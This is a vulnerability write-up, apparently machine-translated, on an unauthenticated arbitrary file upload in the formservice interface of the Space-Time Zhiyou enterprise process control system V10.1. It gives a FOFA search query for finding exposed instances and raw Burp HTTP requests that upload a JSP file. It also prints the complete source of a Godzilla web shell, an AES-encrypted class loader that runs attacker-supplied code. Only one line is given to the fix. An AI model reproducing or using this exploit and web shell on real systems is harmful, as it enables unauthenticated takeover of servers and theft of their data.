Vulnerability in uploading files in the process-based management and control system of Space-time Zhiyou Enterprise

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Product Introduction

Space-Time Zhiyou Enterprise Process Control System is a feature-rich, flexible and customizable enterprise management tool. Through this system, enterprises can realize the automation of processes, the improvement of collaboration, the insight of data and the optimization of decision-making, thereby improving work efficiency, management level and enterprise competitiveness.

2. Vulnerability overview

There is an arbitrary file upload vulnerability in the formservice interface of the process management and control system of Space-Time Zhiyou Enterprise. Unauthenticated attackers can upload backdoor files through this interface, which can eventually lead to server failure.

3. Scope of influence

Time and Space Wisdom Friends V10.1

4. Reproduction environment

FOFA statement: app="Spacetime Smart Friends V10.1"

5. Vulnerability recurrence

burp POC

POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
 
内容

burp screenshot

Verify that the url echoes the content you entered

The file name echoed by http://ip/form/temp/

upload godzilla

POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
 
<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{
    
    public X(ClassLoader z){
    
    super(z);}public Class Q(byte[] cb){
    
    return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){
    
     try{
    
    javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){
    
    return null; }} public static String md5(String s) {
    
    String ret = null;try {
    
    java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {
    
    }return ret; } public static String base64Encode(byte[] bs) throws Exception {
    
    Class base64;String value = null;try {
    
    base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] {
    
     byte[].class }).invoke(Encoder, new Object[] {
    
     bs });} catch (Exception e) {
    
    try {
    
     base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] {
    
     byte[].class }).invoke(Encoder, new Object[] {
    
     bs });} catch (Exception e2) {
    
    }}return value; } public static byte[] base64Decode(String bs) throws Exception {
    
    Class base64;byte[] value = null;try {
    
    base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] {
    
     String.class }).invoke(decoder, new Object[] {
    
     bs });} catch (Exception e) {
    
    try {
    
     base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {
    
     String.class }).invoke(decoder, new Object[] {
    
     bs });} catch (Exception e2) {
    
    }}return value; }%><%try{
    
    byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){
    
    session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{
    
    request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){
    
    }
%>

burp screenshot

Xiaolong poc detection script

test connection

Display successful connection

burp view sent data

show success

6. Repair suggestion

Added strong authentication to interface access rights